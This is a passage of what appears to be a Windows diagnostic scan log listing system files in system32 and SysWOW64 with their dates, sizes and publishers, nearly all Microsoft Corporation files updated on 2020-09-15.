2020-09-15 17:45 - 2020-09-15 17:45 - 000975872 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000966144 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFS.exe
2020-09-15 17:45 - 2020-09-15 17:45 - 000749056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapi.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000669696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFSR.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000515072 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000478208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Picker.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000434688 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000432128 _____ (Microsoft Corporation) C:\WINDOWS\system32\FXSCOMPOSE.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000388096 _____ (Microsoft Corporation) C:\WINDOWS\system32\syncutil.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000361984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapibase.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000304640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\syncutil.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000248320 _____ (Microsoft Corporation) C:\WINDOWS\system32\FXSCOVER.exe
2020-09-15 17:45 - 2020-09-15 17:45 - 000202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\notepad.exe
2020-09-15 17:45 - 2020-09-15 17:45 - 000202240 _____ (Microsoft Corporation) C:\WINDOWS\notepad.exe
2020-09-15 17:45 - 2020-09-15 17:45 - 000185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\FXSUTILITY.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrahc.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\FXSCOMPOSERES.dll
2020-09-15 17:45 - 2020-09-15 17:45 - 000026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\bootim.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 032610752 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsRaw.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 031598936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsRaw.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 024264704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 019869696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 018766848 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramWorld.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 018075136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 006417408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 005820416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 004783344 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 004362816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Mirage.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 004304384 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 003868672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 003659264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 003547784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 003334656 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 002687488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 002519512 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 002452856 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMVCORE.DLL
2020-09-15 17:44 - 2020-09-15 17:44 - 002383672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.AppAgent.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 002338184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 002200576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.ModernAppAgent.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 002136744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMVCORE.DLL
2020-09-15 17:44 - 2020-09-15 17:44 - 002021192 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystems64.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001980728 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001956032 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001812368 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001770040 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001719096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001632056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Uev.AppAgent.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001588016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001542752 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001541224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001506608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001502016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppVEntSubsystems32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001438432 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001438008 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVIntegration.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001411072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmc.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 001352232 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001337344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001314608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001313792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001301584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001260200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001259320 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001253376 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMSPDMOE.DLL
2020-09-15 17:44 - 2020-09-15 17:44 - 001239040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001201152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AgentService.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 001198592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.CommonBridge.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001183256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001138176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplySettingsTemplateCatalog.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 001117344 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001061376 _____ (Microsoft Corporation) C:\WINDOWS\system32\opengl32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 001048064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMSPDMOE.DLL
2020-09-15 17:44 - 2020-09-15 17:44 - 001014864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000969544 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVPolicy.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000961192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000946712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DolbyDecMFT.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000921088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\opengl32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000894264 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVManifest.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\assignedaccessmanagersvc.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000819200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000784896 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshwfp.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000770560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.PrinterCustomActions.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000759792 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMADMOD.DLL
2020-09-15 17:44 - 2020-09-15 17:44 - 000753664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.Office2013CustomActions.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000747320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000744240 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMADMOE.DLL
2020-09-15 17:44 - 2020-09-15 17:44 - 000739128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVOrchestration.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000736056 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntStreamingManager.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000680664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMADMOE.DLL
2020-09-15 17:44 - 2020-09-15 17:44 - 000677888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdvgogl32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000668472 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVReporting.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000665264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMADMOD.DLL
2020-09-15 17:44 - 2020-09-15 17:44 - 000611840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nshwfp.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000604472 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVCatalog.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000591360 _____ (Microsoft Corporation) C:\WINDOWS\system32\AssignedAccessManager.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000575800 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVPublishing.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\IESettingSync.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000538120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000530440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000526848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsecedit.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000520192 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000517120 _____ (Microsoft Corporation) C:\WINDOWS\system32\glmf32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000511488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Uev.Office2013CustomActions.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000482304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000457728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxdiagn.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000446264 _____ (Microsoft Corporation) C:\WINDOWS\system32\TransportDSA.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000436736 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpshell.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.CscUnpinTool.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000408576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glmf32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000377344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000371712 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcGenral.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000367416 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000366392 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVScripting.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000360024 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnrpsvc.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000328192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\upnphost.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000321024 _____ (Microsoft Corporation) C:\WINDOWS\system32\DAFMCP.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000318464 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpinit.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000284672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.ConfigWrapper.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstext40.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000251192 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVFileSystemMetadata.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000245248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glu32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000223544 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVStreamMap.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000219960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVShNotify.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000219136 _____ (Microsoft Corporation) C:\WINDOWS\system32\P2P.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000195384 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVStreamingUX.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000183296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdvgocl32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000176128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IndexedDbLegacy.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000175928 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVDllSurrogate.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000171520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dialclient.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000167224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVNice.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000164352 _____ (Microsoft Corporation) C:\WINDOWS\system32\glu32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000164152 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvsievaluator.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000162616 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvsigpext.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000145408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdvgu1132.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000137016 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000133120 _____ (Microsoft Corporation) C:\WINDOWS\system32\appvetwclientres.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000127488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fdWSD.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000114176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakrathunk.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000101688 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000095744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdvgumd32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fdSSDP.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000062976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iemigplugin.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\udhisapi.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.Office2010CustomActions.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000038712 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncAppvPublishingServer.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000036352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Uev.Office2010CustomActions.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\upnpcont.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimsg.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimsg.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000021816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScriptRunner.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\appvetwstreamingux.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSErrRedir.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 026272768 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 023441408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 014754304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 008897200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 007755776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 007633360 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 007611904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 006357032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 005993968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 005430480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 005056000 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 004892672 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 004747776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 004629328 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 004523008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 004009064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 003978240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AI.MachineLearning.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 003913728 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 003819528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneCoreUAPCommonProxyStub.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002806152 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002757120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002749440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 002635640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002606592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002541056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002433024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002317824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002306048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002265328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002206208 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001951232 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001868672 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d9.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001834496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallService.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001751432 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001720832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001711104 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001695208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001693208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001681408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001659904 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001654824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001640888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001617088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d9.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001557816 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 001494016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001485824 _____ (Microsoft Corporation) C:\WINDOWS\system32\APMon.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001449792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001449472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001430528 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001388544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001375232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdprt.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001333248 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001309504 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2020-09-15 17:43 - 2020-09-15 17:43 - 001296384 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpsvc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\XboxNetApiSvc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001279288 _____ (Microsoft Corporation) C:\WINDOWS\system32\drvstore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001255744 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 001181200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001128544 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 001091584 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
